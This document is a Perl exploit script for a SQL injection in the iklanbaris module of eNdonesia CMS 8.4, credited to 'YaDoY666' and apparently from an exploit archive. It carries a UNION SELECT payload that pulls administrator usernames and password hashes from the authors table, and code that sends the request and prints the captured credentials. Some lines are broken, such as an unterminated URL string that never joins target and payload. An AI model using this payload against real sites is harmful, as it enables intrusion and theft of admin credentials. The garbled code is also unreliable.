eNdonesia CMS 8.4 Mod Iklanbaris Remote SQL Injection Exploi

#!/usr/bin/perl
#=====================================================
#[x] eNdonesia CMS 8.4 Mod Iklanbaris Remote SQL Injection Exploit
#[x] Vendor : http://www.endonesia.org/
#[x] Bug : mod.php?mod=iklanbaris&op=viewlink&cid
#[x] Bugs Found at : 01-08-2008
#[x] Bugs Found By : YaDoY666
#[x] Author Blogs : http://yadoy666.blogspot.com/
#[x] Greets : Jack, n0c0py, odod, Jery Maheswara, x-sari, m4rtincornelis
#=====================================================
use HTTP::Request;
use LWP::UserAgent;

$sql_vulnerable = "/mod.php?mod=iklanbaris&op=viewlink&cid=";
$sql_injection ="-1/**/union+select/**/000,concat(aid,0x3a,pwd),666/**/from+authors/*where admin 1";

if(!@ARGV) { &help;exit(1);}
sub help(){
print "\n [x] eNdonesia CMS 8.4 Mod Iklanbaris Remote SQL Injection Exploit\n";
print " [x]===============================================\n";
print " [x] Use : perl $0 http://www.target.com/n";
print " [x] Dont use \"http:///";
print " [x] Exploit By : YaDoY666 http://yadoy666.blogspot.com/ \n";
print " [x]===============================================\n";
print " [x] YogyaFree - MainHack BrotherHood - Echo - Jasakom \n\n";
print " [x] http://www.yadoy666.blogspot.com/n/n";
}

while (){
my $target = $ARGV[0];
my $exploit = "http:///;
print "\n [-] Trying to inject $target ...\n\n";
my $request = HTTP::Request->new(GET=>$exploit);
my $useragent = LWP::UserAgent->new();
$useragent->timeout(10);
my $response = $useragent->request($request);
if ($response->is_success){
my $res = $response->content;
if ($res =~ m/\>([0-9,a-z]{2,13}):([0-9,a-f]{32})/g) {
my ($username,$passwd) = ($1,$2);
print " [target] $target \n";
print " [loginx] $username:$passwd \n\n";
exit(0);
}
else {
die " [error] Fail to get username and password.\n\n";
}
}
else {
die " [error] Fail to inject $target \n\n";
}
}

#Blogz Nya YaDoY666
#http://yadoy666.blogspot.com